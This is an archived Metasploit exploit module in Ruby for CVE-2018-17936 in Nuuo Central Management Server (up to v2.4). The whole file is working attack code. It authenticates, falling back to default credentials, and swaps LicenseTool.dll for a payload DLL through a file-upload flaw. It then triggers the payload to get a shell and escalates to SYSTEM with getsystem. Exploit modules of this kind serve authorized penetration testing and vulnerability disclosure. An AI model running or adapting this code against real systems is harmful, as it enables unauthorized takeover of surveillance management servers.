##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# NOTE !!!
# This exploit is kept here for archiving purposes only.
# Please refer to and use the version that has been accepted into the Metasploit framework.

# The following versions were tested:
# - 1.5.2 OK
# - 2.1.0 OK
# - 2.3.2 OK
# - 2.4.0 OK
# - 2.6.0 FAIL (vuln fixed?)
# - 2.9.0 FAIL
# - 2.10.0 FAIL

class MetasploitModule < Msf::Exploit::Remote
  Rank = ManualRanking

  include Msf::Exploit::EXE
  include Msf::Exploit::Remote::Nuuo

  def initialize(info={})
    super(update_info(info,
      'Name'           => "Nuuo Central Management Server Authenticated Arbitrary File Upload",
      'Description'    => %q{
      The COMMITCONFIG verb is used by a CMS client to upload and modify the configuration of the
      CMS Server.
      The vulnerability is in the "FileName" parameter, which accepts directory traversal (..\\..\\)
      characters. Therefore, this function can be abused to overwrite any files in the installation
      drive of CMS Server.

      This vulnerability is exploitable in CMS versions up to and including v2.4.

      This module will either use a provided session number (which can be guessed with an auxiliary
      module) or attempt to login using a provided username and password - it will also try the
      default credentials if nothing is provided.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Pedro Ribeiro <pedrib@gmail.com>'         # Vulnerability discovery and Metasploit module
        ],
      'References'     =>
        [
          [ 'CVE', '2018-17936' ],
          [ 'URL', 'https://ics-cert.us-cert.gov/advisories/ICSA-18-284-02' ],
          [ 'URL', 'FULLDISC_URL_TODO' ],
          [ 'URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/advisories/nuuo-cms-ownage.txt' ]
        ],
      'Platform'       => 'win',
      'Arch'           => ARCH_X86,
      'Targets'        =>
        [
          [ 'Nuuo Central Management Server <= v2.4.0', {} ],
        ],
      'Privileged'     => true,
      'DisclosureDate' => "Oct 11 2018",
      'DefaultTarget'  => 0))
  end

  def on_new_session(client)
    if client.type == "meterpreter"
      print_warning("Please wait a bit while we clean up")
      client.sys.process.get_processes().each do |proc|
        if proc['name'] == "NCS_Server.exe"
          client.sys.process.kill(proc['pid'])
          sleep 5
          client.shell_command_token("move /y #{@dll} LicenseTool.dll")
          client.sys.process.execute("NCS_Server.exe")
          print_good("Successfully restored LicenseTool.dll!")
        end
      end

      # elevate privs to system (we're already Admin anyway), and we're done!
      client.run_cmd("getsystem")
      print_good("We should have SYSTEM now, enjoy your shell!")
    else
      print_error("You are not using meterpreter, so we are unable to restore LicenseTool.dll")
      print_error("To restore it, kill the NCS_Server.exe process and copy <CMS_FOLDER>\\#{@dll} to <CMS_FOLDER>\\LicenseTool.dll")
      print_error("... otherwise the Nuuo CMS installation will be nuked!")
      print_good("Anyway, enjoy your shell!")
    end
  end

  def exploit
    login

    if @session == nil
      fail_with(Failure::NoAccess, "Failed to login to Nuuo CMS")
    end

    # Download and upload a backup of LicenseTool.dll, so that we can restore it at post
    # and not nuke the CMS installation.
    @dll = rand_text_alpha(12)
    print_status("Backing up LicenseTool.dll to #{@dll}")
    dll_data = download_file("LicenseTool.dll")
    upload_file(@dll, dll_data)

    print_status("Uploading payload...")
    upload_file("LicenseTool.dll", generate_payload_dll)

    print_status("Sleeping 15 seconds...")
    sleep 15

    print_status("Sending SENDLICFILE request, shell incoming!")
    license_data = rand_text_alpha(50..350)
    send_data_msg(["SENDLICFILE", "FileName: #{rand_text_alpha(3..11)}.lic",
      "Content-Length: " + license_data.length.to_s], license_data)
  end
end
